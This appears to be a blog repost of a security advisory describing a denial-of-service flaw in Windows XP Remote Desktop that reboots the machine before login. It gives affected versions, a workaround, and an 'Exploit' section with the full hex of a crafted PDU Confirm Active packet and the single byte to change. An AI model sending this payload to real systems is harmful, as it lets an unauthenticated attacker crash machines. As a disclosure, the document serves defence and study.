Monday, April 30, 2012

Windows XP Remote Desktop Dos Vulnerability










Vulnerable:
Microsoft Windows XP Professional
Microsoft Windows .NET Standard Server Beta 3

Non-vulnerable:
Microsoft Windows 2000 Server

Background:
Windows XP Professional has a remote denial of service attack when Remote Desktop is enabled. Remote Desktop is XP Professional's single-user RDP server (Terminal Services).

Discussion:
At the start of the protocol there is a negotiation of client and server graphics capabilities, in a packet called PDU Confirm Active. A block of 32 bytes in this packet allows the client to disable the drawing commands that it does not support.

One of these apparently controls whether the Pattern BLT command is sent. On Windows 2000 Server, disabling this command will make the server send bitmaps instead of Pattern BLT commands. However, Windows XP Professional apparently reboots when it tries to render patterns; since this happens while the login screen is being drawn, this does not require the client to have logged on or authenticated to the server. This applies to all versions of the protocol tested (RDP 4.0, 5.0 and 5.1), and it is also reproducible with Windows .NET Standard Server Beta 3.

Workaround:
Disable Remote Desktop (from Control Panel, System, Remote, Remote Desktop, deselect the option "Allow users to connect remotely to this computer").

Exploit:
Shown below is the unencrypted packet contents for the problematic PDU Confirm Active packet. The only change is from 01 to 00 on the line indicated.

c4 01 13 00 f0 03 ea 03 01 00 ea 03 06 00 ae 01 4d 53 54 53 43 00 11 00 00 00 01 00 18 00 01 00 03 00 00 02 00 00 00 00 05 04 00 00 00 00 00 00 00 00 02 00 1c 00 08 00 01 00 01 00 01 00 00 05 00 04 00 00 01 00 01 00 00 00 01 00 00 00 03 00 58 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 14 00 00 00 01 00 00 00 2a 00 01 00 01 01 01 00 00 01 01 01 00 01 00 00 <- was "2a 00 01 01" 00 01 01 01 01 01 01 01 01 00 01 01 01 00 00 00 00 00 a1 06 00 00 00 00 00 00 00 84 03 00 00 00 00 00 e4 04 00 00 13 00 28 00 01 00 00 03 78 00 00 00 78 00 00 00 f3 09 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0a 00 08 00 06 00 00 00 07 00 0c 00 00 00 00 00 00 00 00 00 05 00 0c 00 00 00 00 00 02 00 02 00 08 00 0a 00 01 00 14 00 15 00 09 00 08 00 00 00 00 00 0d 00 58 00 05 00 08 00 09 08 00 00 04 00 00 00 00 00 00 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 0c 00 08 00 01 00 00 00 0e 00 08 00 01 00 00 00 10 00 34 00 fe 00 04 00 fe 00 04 00 fe 00 08 00 fe 00 08 00 fe 00 10 00 fe 00 20 00 fe 00 40 00 fe 00 80 00 fe 00 00 01 40 00 00 08 00 01 00 01 03 00 00 00 0f 00 08 00 01 00 00 00 11 00 0c 00 01 00 00 00 00 0a 64 00 14 00 08 00 01 00 00 00 15 00 0c 00 01 00 00 00 00 0a 00 01

References:
Section 8.2.5 from T.128 Multipoint application sharing, Series T: Terminals for telematic services, ITU-T.

0 comments:

Post a Comment